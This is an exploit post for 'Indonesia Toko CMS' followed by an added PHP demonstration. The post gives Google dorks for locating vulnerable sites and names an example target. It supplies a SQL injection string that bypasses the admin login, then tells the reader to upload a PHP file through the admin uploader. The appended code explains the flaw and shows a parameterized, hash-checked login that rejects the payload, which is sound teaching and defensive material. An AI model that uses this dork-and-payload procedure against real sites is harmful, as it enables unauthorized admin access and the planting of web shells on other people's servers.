[+]Exploit Title: Indonesia Toko CMS Bypass SQL Admin Login
[+]Author: Negat1ve
[+]Team: -1
[+]Google Dork:
inurl:"index.php?mnu=login"
inurl:"/ypathfile/"
[+]Tested on: Windows 10 x64
=======================================
[+]Proof Of Concept:
Use the dork to find a vulnerable site
Example:
http://e-jakarta.com/index.php?mnu=login
Submit the login form with credentials like these
user: ' or 1=1 limit 1 -- -+
password: ' or 1=1 limit 1 -- -+
Then you will get an "Alert", Admin successfully logged in
Go to /index.php?mnu=admin or just click Admin
No need to enter user, email, password. Go to the uploader and upload a PHP file
Your file will go to site/ypathfile/
Greetz: Electronic Thunderbolt Team - Giant-ps - Anonymous arabe - special for Posit1ve ( my gf )
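
Why the credential string in the proof of concept logs in, and the parameterized login that rejects it, shown as an added example that is not the CMS's own code. The `admin` table, its columns and the concatenated query are assumptions about how such a login is commonly written, and in-memory SQLite stands in for the site's database.

```php
<?php
// Added example. Table name, columns and query shape are assumptions,
// not taken from the CMS. Requires the pdo_sqlite extension.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE admin (id INTEGER PRIMARY KEY, user TEXT, password TEXT)');
$ins = $pdo->prepare('INSERT INTO admin (user, password) VALUES (?, ?)');
$ins->execute(['admin', password_hash('constructed-sample-pw', PASSWORD_DEFAULT)]);

// Assumed vulnerable pattern: form input is concatenated into the SQL text,
// so a quote in $user ends the string literal and the rest is parsed as SQL.
function login_concat(PDO $pdo, string $user, string $pass): bool
{
    $sql = "SELECT id FROM admin WHERE user = '$user' AND password = '$pass'";
    return $pdo->query($sql)->fetch() !== false;
}

// Hardened form: the user name is a bound parameter (always data, never SQL),
// and the password is checked in PHP against a stored hash.
function login_prepared(PDO $pdo, string $user, string $pass): bool
{
    $stmt = $pdo->prepare('SELECT password FROM admin WHERE user = ?');
    $stmt->execute([$user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row !== false && password_verify($pass, $row['password']);
}

// The value from the advisory. After concatenation the statement becomes
//   ... WHERE user = '' or 1=1 limit 1 -- (remainder commented out)
// which matches the first row regardless of the password.
$payload = "' or 1=1 limit 1 -- -+";

$cases = [
    'concatenated query, advisory payload' => login_concat($pdo, $payload, $payload),
    'prepared query, advisory payload'     => login_prepared($pdo, $payload, $payload),
    'prepared query, valid credentials'    => login_prepared($pdo, 'admin', 'constructed-sample-pw'),
    'prepared query, wrong password'       => login_prepared($pdo, 'admin', 'guess'),
];

foreach ($cases as $label => $accepted) {
    printf("%-40s %s\n", $label, $accepted ? 'ACCEPTED' : 'rejected');
}
```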